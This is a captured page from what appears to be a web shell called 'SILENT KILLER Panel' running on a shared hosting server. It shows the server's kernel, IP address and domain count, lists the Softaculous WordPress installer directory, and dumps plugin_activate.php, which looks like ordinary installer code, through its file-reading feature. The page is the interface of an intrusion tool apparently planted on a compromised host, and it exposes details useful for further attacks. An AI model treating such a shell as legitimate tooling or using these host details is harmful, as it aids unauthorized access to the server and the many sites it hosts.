SILENT KILLERPanel

Current Path: > > var > softaculous > wp66


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //var/softaculous/wp66

NameTypeSizeLast ModifiedActions
images Directory - -
languages Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
plugins Directory - -
.htaccess File 482 bytes November 13 2024 10:30:00.
_htaccess File 553 bytes November 13 2024 10:30:00.
_index.php File 59 bytes November 13 2024 10:30:00.
_wp-config.php File 3176 bytes November 13 2024 10:30:00.
add_user.php File 461 bytes November 13 2024 10:30:00.
backup.php File 3099 bytes August 08 2025 12:41:50.
check_charset.php File 2067 bytes November 13 2024 10:30:00.
clone.php File 33007 bytes August 08 2025 12:41:50.
clone.xml File 497 bytes November 13 2024 10:30:00.
edit.php File 9680 bytes August 08 2025 12:41:50.
edit.xml File 1801 bytes November 13 2024 10:30:00.
extend.php File 95989 bytes August 08 2025 12:41:50.
fileindex.php File 291 bytes November 13 2024 10:30:00.
import.php File 6673 bytes August 08 2025 12:41:50.
info.xml File 15266 bytes August 08 2025 11:27:56.
install.js File 925 bytes November 13 2024 10:30:00.
install.php File 31557 bytes August 08 2025 12:41:50.
install.xml File 9949 bytes April 07 2025 07:33:28.
md5 File 5111 bytes August 08 2025 12:41:50.
multisite.sql File 38692 bytes August 08 2025 11:27:56.
notes.txt File 6233 bytes August 08 2025 11:27:56.
plugin_activate.php File 596 bytes November 13 2024 10:30:00.
plugin_deactivate.php File 613 bytes November 13 2024 10:30:00.
sign_on.php File 3359 bytes January 28 2025 09:25:30.
soft.htaccess File 127 bytes November 13 2024 10:30:00.
upgrade.php File 14394 bytes August 08 2025 12:41:50.
upgrade.xml File 1665 bytes November 13 2024 10:30:00.
wp-config.php File 2883 bytes November 13 2024 10:30:00.
wp66.sql File 30911 bytes August 08 2025 11:27:56.
wp66.zip File 25649599 bytes August 08 2025 11:27:56.

Reading File: //var/softaculous/wp66/plugin_activate.php

<?php

@unlink(__FILE__);

// Validate if the request is from Softaculous
if($_REQUEST['pass'] != '[[autopass]]'){
	die("Unauthorized Access");
}

require_once('wp-blog-header.php');
require_once('wp-includes/pluggable.php');
require_once('wp-admin/includes/plugin.php');

$plugins_to_activate = '[[plugins_to_activate]]';
$plugins_to_activate = unserialize($plugins_to_activate);

$ret = array();

foreach($plugins_to_activate as $plugn_file){
	// null means success
	$ret[$plugn_file] = activate_plugin($plugn_file);	
}

echo '<plugin_activate>'.serialize($ret).'</plugin_activate>';

exit(0);

SILENT KILLER Tool